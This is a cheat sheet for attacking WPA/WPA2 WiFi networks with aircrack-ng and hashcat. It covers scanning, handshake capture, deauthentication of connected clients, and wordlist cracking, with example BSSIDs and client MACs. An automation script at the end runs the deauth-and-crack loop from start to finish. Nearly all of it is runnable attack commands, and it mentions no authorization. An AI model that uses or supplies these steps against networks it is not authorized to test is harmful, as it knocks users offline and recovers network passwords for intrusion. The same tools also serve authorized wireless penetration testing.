1. Scan Available WiFi Networks
Scan all nearby WiFi networks
# mon0 is the monitor-mode interface created with airmon-ng; substitute yours (often wlan0mon)
sudo airodump-ng mon0
Scan only 2.4 GHz networks (802.11b/g)
sudo airodump-ng --band bg mon0
Scan only 5 GHz networks (802.11a)
sudo airodump-ng --band a mon0
Band Option Summary
--band a    → 5 GHz (802.11a)
--band b    → 2.4 GHz (802.11b)
--band g    → 2.4 GHz (802.11g)
--band bg   → All 2.4 GHz (recommended)
--band abg  → Both 2.4 GHz and 5 GHz
2. Capture WPA/WPA2 Handshake
Start listening on the target AP
# Replace <channel>, <BSSID>, and <output_filename>
sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0
Example
# Capture handshake from AP on channel 36
sudo airodump-ng -c 36 --bssid A0:70:B7:2C:07:70 -w Tenda.captured mon0
This starts a capture locked to the AP's channel. Note the file name: airodump-ng always appends -NN to the prefix, so the example above writes Tenda.captured-01.cap (incrementing to -02 if that file already exists). Keep this terminal open: when the handshake has been captured, "WPA handshake: <BSSID>" appears in the top-right of the display.
3. Force Reconnection with Deauth Attack
Deauth all clients on the target AP
sudo aireplay-ng --deauth 10 -a <BSSID> mon0
Deauth a specific client only
# Replace <BSSID> and <Client_MAC>
sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> mon0
Example
# Deauth one device from the AP
sudo aireplay-ng --deauth 10 -a A0:70:B7:2C:07:70 -c 32:6D:90:EC:CF:A0 mon0
Sending deauthentication frames forces an associated client to reconnect, and the reconnection produces the 4-way handshake that the airodump-ng terminal from step 2 records. Three conditions must hold: at least one client must be connected to the AP, the interface must be on the AP's channel (airodump-ng already locked it there, so run aireplay-ng on the same interface), and the network must not use Protected Management Frames (802.11w, mandatory in WPA3), since PMF makes clients ignore these unauthenticated deauth frames.
4. Verify and Crack Handshake
Verify and crack the handshake with aircrack-ng
# Use the file airodump-ng actually wrote: <prefix>-01.cap, not <prefix>.cap
aircrack-ng Tenda.captured-01.cap -w rockyou.txt
Before it starts cracking, aircrack-ng prints a network listing; "WPA (1 handshake)" next to the BSSID means a usable handshake is present, while "WPA (0 handshake)" means you need to go back to step 3. Running the same command without -w prints only that listing, which is a quick way to check the capture before spending time on a wordlist. During capture the same event shows as "WPA handshake: <BSSID>" in the top-right of airodump-ng.
Convert the capture for Hashcat
hcxpcapngtool -o Tenda.hc22000 Tenda.captured-01.cap
Crack the handshake with Hashcat
# Run the attack first; --show does not crack anything, it only prints hashes already cracked and stored in the potfile
hashcat -m 22000 Tenda.hc22000 rockyou.txt
hashcat -m 22000 Tenda.hc22000 --show
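The four steps above combined into one script. This is an added example, not part of the original cheat sheet: it assumes airodump-ng, aireplay-ng, aircrack-ng, hcxpcapngtool and hashcat are on PATH and runnable via sudo, that aircrack-ng's network summary prints "WPA (N handshake)" for each BSSID, and that a monitor-mode interface already exists. The interface, BSSID, channel, capture prefix, wordlist and optional client MAC are arguments; next_capture_path reproduces airodump-ng's -NN numbering so the script checks the file that was actually written rather than <prefix>.cap.

```shell
#!/bin/sh
# Added example: end-to-end WPA/WPA2 handshake capture and crack using the
# commands from the cheat sheet. Tool names are real; the summary-text match
# in has_handshake is an assumption about aircrack-ng's output format.
set -eu

# airodump-ng never writes <prefix>.cap. It appends the first free -NN index:
# <prefix>-01.cap, then -02.cap if that exists, and so on. Mirror that here.
next_capture_path() {
    ncp_prefix=$1
    ncp_n=1
    while [ -e "$(printf '%s-%02d.cap' "$ncp_prefix" "$ncp_n")" ]; do
        ncp_n=$((ncp_n + 1))
    done
    printf '%s-%02d.cap' "$ncp_prefix" "$ncp_n"
}

# Sanity check a MAC address: six colon-separated hex octets, any case.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Return 0 when the capture holds a usable handshake for the given BSSID.
# Assumption: aircrack-ng lists each network as "... WPA (N handshake)".
# stdin comes from /dev/null so that, if several networks are present, the
# "Index number of target network?" prompt gets EOF instead of hanging.
has_handshake() {
    aircrack-ng "$1" </dev/null 2>/dev/null \
        | grep -i "$2" \
        | grep -qE 'WPA \([1-9][0-9]* handshake'
}

usage() {
    echo "usage: $0 <iface> <BSSID> <channel> <prefix> <wordlist> [client_mac]" >&2
    exit 2
}

main() {
    [ $# -ge 5 ] || usage
    iface=$1; bssid=$2; channel=$3; prefix=$4; wordlist=$5; client=${6:-}
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; exit 2; }
    [ -z "$client" ] || valid_mac "$client" || { echo "bad client MAC: $client" >&2; exit 2; }

    cap=$(next_capture_path "$prefix")

    # Step 2: focused capture locked to the AP's channel, in the background.
    sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    trap 'sudo kill "$dump_pid" 2>/dev/null || true' EXIT
    sleep 5   # let airodump-ng open the file and see the AP's beacons

    # Step 3: deauth in rounds until aircrack-ng confirms a handshake, or give up.
    for attempt in 1 2 3 4 5; do
        if [ -n "$client" ]; then
            sudo aireplay-ng --deauth 10 -a "$bssid" -c "$client" "$iface" >/dev/null 2>&1 || true
        else
            sudo aireplay-ng --deauth 10 -a "$bssid" "$iface" >/dev/null 2>&1 || true
        fi
        sleep 10   # give the client time to reassociate and complete the 4-way handshake
        if has_handshake "$cap" "$bssid"; then
            echo "handshake for $bssid captured in $cap (round $attempt)"
            break
        fi
    done
    has_handshake "$cap" "$bssid" || {
        echo "no handshake after $attempt rounds: a client must be associated and PMF (802.11w) must be off" >&2
        exit 1
    }

    # Step 4: convert for hashcat, run the attack, then --show the cracked PSK from the potfile.
    hcxpcapngtool -o "${prefix}.hc22000" "$cap"
    hashcat -m 22000 "${prefix}.hc22000" "$wordlist" || true   # exit status 1 means wordlist exhausted
    hashcat -m 22000 "${prefix}.hc22000" --show
}

# Run the workflow only when arguments are given; sourcing the file just defines the functions.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

Invoke it as, for instance, sh capture_handshake.sh mon0 A0:70:B7:2C:07:70 36 Tenda.captured rockyou.txt (the script name is this example's choice). The deauth loop stops as soon as aircrack-ng reports a handshake, which avoids the common mistake of flooding deauths for minutes when the first round already succeeded, or of running hashcat against a capture that only has beacons in it.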